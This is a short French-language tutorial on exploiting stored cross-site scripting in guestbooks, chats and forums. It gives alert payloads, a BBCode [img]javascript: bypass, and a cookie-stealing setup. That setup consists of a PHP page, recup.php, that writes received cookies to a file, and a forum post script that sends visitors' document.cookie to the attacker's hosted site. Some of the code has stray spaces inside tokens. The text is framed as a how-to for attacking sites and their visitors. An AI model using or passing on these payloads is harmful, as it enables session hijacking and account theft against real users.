Tout d'abords quesqu'une faille xss???
Une faille xss c'est quand on a possibliter d'insérer du HTML ou
Javascript dans un livre d'or,chat ou forum...
Grace à cette faille on peut par exemple faire une alert,une redirection
ou meme recupere les cookies des visiteurs.
Comment trouver cette faille???
C'est simple il suffit d'insere un petit message entre 2 balise tel que <i>Yop
a la noix de coco</i>...
Si le texte est en italique,la faille est présente...
Que faire de cette faille???
On peux par exemple faire un message d'alert,ce qui donnera ça:
<
script>alert('Hacked by SpyneNetwa')
Dorénavant quand on ouvra cette page le message "Hacked by SpyneNetwa" s'affichera...
Quelque fois le HTML n'est pas autorisé et la il va falloir changer
de technique,en effet il suffit juste d'intégrer ça:
[img]javascript:alert('Hacked by SpyneNetwa')[/img]
Explication?Quand le serveur exécute la page il trouve les balise
image et cherche son contenu,ne trouvant pas d'image il met le script.
On peut aussi se servir de la balise plaintext pour afficher le code en texte...
Comment récupérer les cookies?
Il va falloir heberger une page appelé recup.php...
Dans la page recup.php on met le code suivant:
<?
if($ cookie){
$fp=fopen(" cookies.txt","a"); // On ouvre le fichier cookis.txt
fputs($fp,"$ cookie\r\n"); // On écrit le contenu du cookie
dans le fichier
fclose($fp);
}
?>
<
script>
opener=self;
self.close(); // ferme la fenètre
<
/ script>
Bon ensuite on retourne sur le forum et on poste une xss:
Amener moi vos cookies<script>window.open(" http:// www.votresite.fr/recup.php?
cookie="+document. cookie);</ script> .
Et voila sur votre ftp un fichier cookies.txt va se créer ou vous pourrer récupérer les cookies....